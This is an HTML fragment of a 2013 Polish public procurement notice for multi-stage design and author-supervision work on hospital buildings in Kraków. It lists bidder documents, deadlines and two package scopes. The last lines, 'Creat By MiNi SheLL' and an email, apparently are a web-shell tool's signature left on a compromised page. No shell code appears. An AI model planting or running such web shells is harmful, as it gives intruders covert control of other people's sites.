<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Wypełniony FORMULARZ OFERTOWY - według ZAŁĄCZNIKA NR 1 do SIWZ
2.	Pełnomocnictwo do podpisania oferty w toczącym się postępowaniu (pełnomocnictwo do zaciągania zobowiązań w imieniu Wykonawcy), dołączone do oferty, o ile nie wynika z innych dokumentów, załączonych przez Wykonawcę. 
3.	Oświadczenie Wykonawcy dotyczące spełnienia warunków udziału w postępowaniu, zgodnie z art. 22 ustawy, ściśle według formularza stanowiącego ZAŁĄCZNIK NR 2 do SIWZ, a także ZAŁĄCZNIK NR 2A i co za tym idzie pisemne celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia (o ile dotyczy).
4.	Aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt. 2 ustawy wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
5.	Oświadczenie o braku podstaw do wykluczenia zgodnie z załącznikiem nr 3.
6.	Informację dotyczącą przynależności do grupy kapitałowej według ZAŁĄCZNIKA NR 4.
7.	Dokumenty :
Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te usługi zostały wykonane lub są wykonywane należycie,
wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych i doświadczenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności, oraz informacją o podstawie do dysponowania tymi osobami, a także jeśli przedstawi oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia. 
8.	Wykonawca mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w pkt. 4  odpowiedni dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
nie otwarto jego likwidacji ani nie ogłoszono upadłości- dokument wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
9. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 8, zastępuje się je dokumentem zawierającym oświadczenie Wykonawcy złożone przed notariuszem, właściwym organem sądowym, administracyjnym, albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania w zakresie dat wystawienia dokumentów, przepisy punktu 8 stosuje się odpowiednio</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zakazane są zmiany postanowień zawartej umowy w stosunku do treści oferty na podstawie, której dokonano wyboru Wykonawcy, chyba że konieczność wprowadzenia takich zmian wynika z potrzeb Zamawiającego lub z przyczyn dotyczących Zamawiającego lub też z przyczyn obiektywnych, niezależnych od żądnej ze stron i dotyczy:
1)	terminu wykonania zamówienia na skutek przedłużenie się terminu załatwienia sprawy tj. wydania przez organ administracji lub inne podmioty wymaganych decyzji, warunków, zezwoleń, uzgodnień z przyczyn niezależnych od Wykonawcy,
2)	terminu wykonania zamówienia na skutek okoliczności innych niż w pkt. 1. Warunkiem dokonania takiej zmiany jest wystąpienie okoliczności niezależnych od stron umowy i niezawinionych przez żadną ze stron umowy,
2Zmiany umowy, o których mowa wyżej wymagają aneksu w formie pisemnej pod rygorem nieważności</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.5wszk.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zamówienia Publiczne (budynek Komendy nr 32), ul. Wrocławska 1-3, 30-901 Kraków.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.09.2013 godzina 11:00, miejsce: Kancelaria Szpitala (budynek Komendy nr 32), ul. Wrocławska 1-3, 30-901 Kraków.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zgodnie z programem inwestycji w tym zakresie zamówienie w zakresie pakietu nr 1 zostanie wykonane etapami: 
ETAP I - Opracowania wstępne - PRACE PROJEKTOWE PRZYGOTOWAWCZE (termin wykonania  - 3 miesiące od dnia podpisania umowy)
1.	 Badanie geologiczne gruntu; 
2.	Odkrywki fundamentów w celu ich inwentaryzacji; 
3.	Inwentaryzacja architektoniczna pełna; 
4.	Inwentaryzacja konstrukcyjna w niezbędnym zakresie;  
5.	Inwentaryzacja - rozeznanie w poszczególnych branżach  instalacyjnych w niezbędnym zakresie; 
6.	Rozeznanie sieci i przyłączy dotyczących budynku oraz ich parametrów. 
7.	Uzyskanie wewnętrznych warunków technicznych oraz wytycznych Inwestora,
8.	Uzyskanie niezbędnej dokumentacji geodezyjnej /wypisy z rejestru gruntów, wyrysy z ewidencji gruntów, kopia mapy zasadniczej do celów projektowych,
9.	Program funkcjonalno - użytkowy;
10.	Operat na temat dostosowania budynku do aktualnych warunków technicznych w szczególności w zakresie ochrony przeciwpożarowej budynku;
11.	Koncepcja wielobranżowa przebudowy uzgodniona z Zamawiającym na podstawie zatwierdzonego programu funkcjonalno - użytkowego;
-	Konsultacje szczegółowe z Użytkownikami
-	Konsultacje z Rzeczoznawcami
-	Określenie wytycznych dla ochrony p. poż. 
-	Ramowe wytyczne technologiczne
-	Projekt koncepcyjny
-	Szacunkowe koszty inwestycji 
-	Wizualizacja
12.	Niezbędne opinie techniczne i uzgodnienia:
-	Wytyczne konserwatorskie
-	Opinia Miejskiego Konserwatora Zabytków dotycząca koncepcji z uwzględnieniem wytycznych Operatu Ppoż; 
13.	Bilans energetyczny budynku wraz zaleceniami uwzględniającymi wytyczne konserwatorskie;  
14.	Określenie zapotrzebowania na media: wodę, energię elektryczną, energię cieplną, gaz i sposobu odprowadzania lub oczyszczania ścieków, a także innych potrzeb w zakresie infrastruktury technicznej, a w razie potrzeby sposobu unieszkodliwiania odpadów;
15.	Określenie planowanego sposobu zagospodarowania terenu; 
16.	Sporządzenie ZKZ wstępne oraz harmonogramu
17.	Złożenie wniosku o wydanie decyzji o ustaleniu lokalizacji inwestycji celu publicznego, reprezentowanie zamawiającego w postępowaniu, obsługa formalna; 
ETAP II - Projekty budowlane (termin wykonania - 7 miesięcy od dnia podpisania umowy)
1	Uzyskanie niezbędnych wytycznych Miejskiego Konserwatora Zabytków dotyczących koncepcji remontu    
budynku;
2	Uzyskanie decyzji o środowiskowych uwarunkowaniach (jest wymagane dla planowanych: przedsięwzięć mogących zawsze znacząco oddziaływać na środowisko, przedsięwzięć mogących potencjalnie znacząco oddziaływać na środowisko), lub decyzji umarzającej
3	Uzyskanie decyzji o ustaleniu lokalizacji inwestycji celu publicznego
4	Projekt architektoniczny;
5	Projekt zagospodarowanie terenu;
6	Projekt zieleni w najbliższym sąsiedztwie obiektu;
7	Ekspertyza konstrukcyjna o stanie technicznym budynku;
8	Projekt konstrukcyjny wraz z obliczeniami statycznymi , rysunkami warsztatowymi i zestawieniem materiałów;
9	Ekspertyzy technicznej właściwej jednostki badawczo-rozwojowej albo rzeczoznawcy budowlanego oraz do spraw zabezpieczeń przeciwpożarowych, uzgodnionych z Wojskową  Strażą Pożarną;
10	Projekty instalacji elektrycznych:
11	Projekty instalacji słaboprądowych i teletechnicznych:
12	Projekt instalacji odgromowej opracowany z godnie z aktualnie obowiązującą normą:
wymiana instalacji i osprzętu dachowego,
13	Projekty instalacji sanitarnych:
13.1         Projekt instalacji wodno - kanalizacyjnej 
13.2 Projekt instalacji centralnego ogrzewania:
13.3 Wentylacja i Klimatyzacja
14 Projekty budowlane winny być zgodne z obowiązującymi przepisami  i sztuką budowlaną 
i uzgodnione z:
-	Rzeczoznawcą ds. sanitarno - epidemiologicznych;
-	Rzeczoznawcą ds. p.poż.;
-	Rzeczoznawcą ds. BHP
-	Użytkownikiem.
-	Dostawcami mediów ( Dział techniczny Szpitala, MPEC, TAURON, MPWiK )
-	Inne niezbędne  
15.  Opracowanie informacji dotyczącej bezpieczeństwa i ochrony zdrowia.
16.	Uzyskanie pozwolenia  konserwatorskiego na wykonanie prac.
17.	Złożenie wniosku o wydanie decyzji pozwolenia na budowę.
ETAP III - Projekty wykonawcze(termin wykonania - 2 miesiące od dnia ostateczności decyzji o pozwolenie na budowę, nie później niż 13 miesięcy od dnia podpisania umowy)
1.	Projekt architektoniczny z detalami, elementami wykończenia i wyposażeniem;
2.	Projekt wnętrz dla części pomieszczeń
3.	Projekt zagospodarowania terenu
4.	Projekt zieleni w najbliższym sąsiedztwie obiektu;
5.	Projekt konstrukcyjny wraz z obliczeniami statycznymi , rysunkami warsztatowymi i zestawieniem materiałów;
6.	Projekty instalacji elektrycznych
7.	Projekty instalacji słaboprądowych i teletechnicznych:
8.	Projekt instalacji odgromowej opracowany z godnie z aktualnie obowiązującą normą:
9.    Projekty instalacji sanitarnych:
9.1 Projekt instalacji wodno - kanalizacyjnej 
9.2 Projekt instalacji centralnego ogrzewania:
10. Wentylacja i Klimatyzacja
11. Przedmiary robót, kosztorysy inwestorskie i Specyfikacje Techniczne
    Wykonania i Odbioru Robót do projektów WKI j.w.,  ZKZ po zakończeniu prac projektowo-kosztorysowych.
12. Uzyskanie ostatecznej decyzji pozwolenia na budowę.
13. Ewentualnie uzyskanie decyzji o wyrażeniu zgody na usunięcie kolidujących drzew lub krzewów
ETAP IV - uczestniczenie w pracach komisji przetargowej powołanej do przeprowadzenia postępowania o udzielenie zamówienia publicznego na roboty budowlane
ETAP V - Pełnienie nadzorów autorskich w trakcie realizacji prac budowlanych oraz uczestniczenie w naradach dotyczących postępu prac przy realizacji inwestycji.
wykonanie mapy sytuacyjno-wysokościowej do celów projektowych 
wykonanie inwentaryzacji budynków do celów projektowych 
wykonanie niezbędnych ekspertyz 
sporządzenie koncepcji programowo przestrzennej, zakończonej uzyskaniem uzgodnień z Miejskim Konserwatorem Zabytków oraz uzyskaniem decyzji o ustaleniu lokalizacji inwestycji celu publicznego 
sporządzenie charakterystyki energetycznej obiektu i audytu energetycznego
w zależności od potrzeb opracowanie projektu geologicznego inżynierskiego 
wykonanie informacji bezpieczeństwa i ochrony zdrowia (BIOZ) 
wykonanie dokumentacji budowlanej - 5 egz. w wersji papierowej(w tym jedna kopia papierowa kolorowa po opieczętowaniu przez Wojewodę Małopolskiego Wydział Infrastruktury)  oraz 2 egz. w wersji elektronicznej w formacie PDF. 
uzyskanie wymaganych pozwoleń, zezwoleń zakończone uzyskaniem pozwoleniem na budowę 
wykonanie dokumentacji wykonawczej - 5 egz. w wersji papierowej oraz 2 egz. w wersji elektronicznej w formacie PDF
wykonanie dokumentacji kosztorysowej - 4 egz. w wersji papierowej oraz 1 egz. w wersji PDF.
wykonanie przedmiaru robót - 4 egz. w wersji papierowej oraz 1 egz. w wersji PDF.
sporządzenie specyfikacji technicznych wykonania i odbioru robót budowlanych - 4 egz. w wersji papierowej oraz 1 egz. w wersji PDF.
ZKZ wstępne i końcowe oraz harmonogram - 3 egz. w wersji papierowej oraz 1 egz. w wersji PDF.
UWAGA - pliki i foldery mają być opisane w sposób określający ich zawartość.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet nr 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zgodnie z programem inwestycji w tym zakresie zamówienie w zakresie pakietu nr 2 zostanie wykonane etapami:
ETAP I - Opracowania wstępne - PRACE PROJEKTOWE PRZYGOTOWAWCZE (termin wykonania  - 3 miesiące od dnia podpisania umowy)
1	Badanie geologiczne gruntu; 
2	Odkrywki fundamentów w celu ich inwentaryzacji; 
3	Inwentaryzacja architektoniczna pełna; 
4	Inwentaryzacja konstrukcyjna w niezbędnym zakresie;  
5	Inwentaryzacja - rozeznanie w poszczególnych branżach instalacyjnych w niezbędnym zakresie; 
6	Rozeznanie sieci i przyłączy dotyczących budynku oraz ich parametrów. 
7	Uzyskanie wewnętrznych warunków technicznych oraz wytycznych Inwestora,
8	Niezbędna dokumentacja geodezyjna / wypisy z rejestru gruntów, 
wyrysy z ewidencji gruntów, kopia mapa zasadniczej do celów projektowych,
9	Program funkcjonalno - użytkowy;
10	Operat na temat dostosowania budynku do aktualnych warunków technicznych 
w szczególności w zakresie ochrony przeciwpożarowej budynku;
11	Koncepcja wielobranżowa przebudowy uzgodniona z Zamawiającym na podstawie zatwierdzonego programu funkcjonalno - użytkowego;
-	Konsultacje szczegółowe z Użytkownikami
-	Konsultacje z Rzeczoznawcami
-	Określenie wytycznych dla ochrony p. poż. 
-	Ramowe wytyczne technologiczne
-	Projekt koncepcyjny
-	Szacunkowe koszty inwestycji 
-	Wizualizacja
12.	Opracowanie programu konserwatorskiego wraz z określeniem zakresu odkrywek niezbędnych do wykonania ekspertyzy konstrukcyjnej; 
13.	Niezbędne opinie techniczne i uzgodnienia:
-	Wytyczne konserwatorskie
-	Opinia Miejskiego Konserwatora Zabytków dotycząca koncepcji 
z uwzględnieniem wytycznych Operatu Ppoż; 
14.	Bilans energetyczny budynku wraz zaleceniami uwzględniającymi wytyczne konserwatorskie;  
15.	Określenie zapotrzebowania na media: wodę, energię elektryczną, energię cieplną, gaz i sposobu odprowadzania lub oczyszczania ścieków, a także innych potrzeb w zakresie infrastruktury technicznej, a w razie potrzeby sposobu unieszkodliwiania odpadów;
16.	Określenie planowanego sposobu zagospodarowania terenu; 
17.	Sporządzenie ZKZ wstępne oraz harmonogramu
18.	Złożenie wniosku o Ustalenie Lokalizacji Inwestycji Celu Publicznego, reprezentowanie Zamawiającego w postępowaniu, obsługa formalna; 
ETAP II - Projekty budowlane (termin wykonania - 7 miesięcy od dnia podpisania umowy)
1.	Uzyskanie niezbędnych wytycznych Miejskiego Konserwatora Zabytków dotyczącą koncepcji remontu    
budynku;
2.	Uzyskanie decyzji o środowiskowych uwarunkowaniach (jest wymagane dla planowanych: przedsięwzięć mogących zawsze znacząco oddziaływać na środowisko, przedsięwzięć mogących potencjalnie znacząco oddziaływać na środowisko), lub decyzji umarzającej; 
3.	Uzyskanie decyzji o ustaleniu lokalizacji inwestycji celu publicznego
4.	Projekt architektoniczny;
5.	Projekt zagospodarowanie terenu;
6.	Projekt zieleni w najbliższym sąsiedztwie obiektu;
7.	Projekt ochrony radiologicznej;
8.	Ekspertyza konstrukcyjna o stanie technicznym budynku;
9.	Projekt konstrukcyjny wraz z obliczeniami statycznymi , rysunkami warsztatowymi i zestawieniem materiałów
10.	Ewentualne odkrywki na podstawie programu konserwatorskiego i zgody od MKZ niezbędne do projektu konstrukcyjnego;
11.	Ekspertyzy technicznej właściwej jednostki badawczo-rozwojowej albo rzeczoznawcy budowlanego oraz do spraw zabezpieczeń przeciwpożarowych, uzgodnionych z Wojskową  Strażą Pożarną;
12.	Projekty instalacji elektrycznych:
13.	Projekty instalacji słaboprądowych i teletechnicznych:
14.	Projekt instalacji odgromowej opracowany z godnie z aktualnie obowiązującą normą:
wymiana instalacji i osprzętu dachowego,
15.	Projekty instalacji sanitarnych:
15.1 Projekt instalacji wodno - kanalizacyjnej 
15.2 Projekt instalacji centralnego ogrzewania:
16 Wentylacja i Klimatyzacja
17 Projekty budowlane winny być zgodne z obowiązującymi przepisami  i sztuką budowlaną 
i uzgodnione z:
-	Rzeczoznawcą ds. sanitarno - epidemiologicznych;
-	Rzeczoznawcą ds. p.poż.;
-	Rzeczoznawcą ds. BHP
-	Użytkownikiem.
-	Dostawcami mediów ( Dział techniczny Szpitala, MPEC, TAURON, MPWiK )
-	Inne niezbędne 
18.	Opracowanie informacji dotyczącej bezpieczeństwa i ochrony zdrowia.
19.	Uzyskanie pozwolenia  konserwatorskiego na wykonanie prac.
20.	Złożenie wniosku o wydanie decyzji pozwolenia na budowę.
ETAP III - Projekty wykonawcze(termin wykonania - 2 miesiące od dnia ostateczności decyzji o pozwolenie na budowę, nie później niż 13 miesięcy od dnia podpisania umowy)
1	Projekt architektoniczny z detalami, elementami wykończenia i wyposażeniem;
2	Projekt wnętrz dla części pomieszczeń
3	Projekt zagospodarowanie terenu;
4	Projekt zieleni w najbliższym sąsiedztwie obiektu;
5	Projekt ochrony radiologicznej;
6	Projekt konstrukcyjny wraz z obliczeniami statycznymi , rysunkami warsztatowymi i zestawieniem materiałów;
7	Projekty instalacji elektrycznych:
8.	Projekty instalacji słaboprądowych i teletechnicznych:
9.	Projekt instalacji odgromowej opracowany z godnie z aktualnie obowiązującą normą:
10.    	Projekty instalacji sanitarnych:
10.1 	Projekt instalacji wodno - kanalizacyjnej 
10.2 	Projekt instalacji centralnego ogrzewania:
11.	 Wentylacja i Klimatyzacja
12. Przedmiary robót, kosztorysy inwestorskie i Specyfikacje Techniczne
    Wykonania i Odbioru Robót do projektów WKI j.w.,  ZKZ po zakończeniu prac projektowo-kosztorysowych.
13. Uzyskanie ostatecznej decyzji pozwolenia na budowę.
14. Ewentualnie uzyskanie decyzji o wyrażeniu zgody na usunięcie kolidujących drzew lub krzewów
ETAP IV - uczestniczenie w pracach komisji przetargowej powołanej do przeprowadzenia postępowania o udzielenie zamówienia publicznego na roboty budowlane,
ETAP V - Pełnienie nadzorów autorskich w trakcie realizacji prac budowlanych oraz uczestniczenie w naradach dotyczących postępu prac przy realizacji inwestycji.
wykonanie mapy sytuacyjno-wysokościowej do celów projektowych 
wykonanie inwentaryzacji budynków do celów projektowych 
wykonanie niezbędnych ekspertyz 
sporządzenie koncepcji programowo przestrzennej, zakończonej uzyskaniem uzgodnień z Miejskim Konserwatorem Zabytków oraz uzyskaniem decyzji o ustaleniu lokalizacji inwestycji celu publicznego 
sporządzenie charakterystyki energetycznej obiektu i audytu energetycznego
w zależności od potrzeb opracowanie projektu geologicznego inżynierskiego 
wykonanie informacji bezpieczeństwa i ochrony zdrowia (BIOZ) 
wykonanie dokumentacji budowlanej - 5 egz. w wersji papierowej(w tym jedna kopia papierowa kolorowa po opieczętowaniu przez Wojewodę Małopolskiego Wydział Infrastruktury)  oraz 2 egz. w wersji elektronicznej w formacie PDF. 
uzyskanie wymaganych pozwoleń, zezwoleń zakończone uzyskaniem pozwoleniem na budowę 
wykonanie dokumentacji wykonawczej - 5 egz. w wersji papierowej oraz 2 egz. w wersji elektronicznej w formacie PDF
wykonanie dokumentacji kosztorysowej - 4 egz. w wersji papierowej oraz 1 egz. w wersji PDF.
wykonanie przedmiaru robót - 4 egz. w wersji papierowej oraz 1 egz. w wersji PDF.
sporządzenie specyfikacji technicznych wykonania i odbioru robót budowlanych - 4 egz. w wersji papierowej oraz 1 egz. w wersji PDF.
ZKZ wstępne i końcowe oraz harmonogram - 3 egz. w wersji papierowej oraz 1 egz. w wersji PDF.
UWAGA - pliki i foldery mają być opisane w sposób określający ich zawartość.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com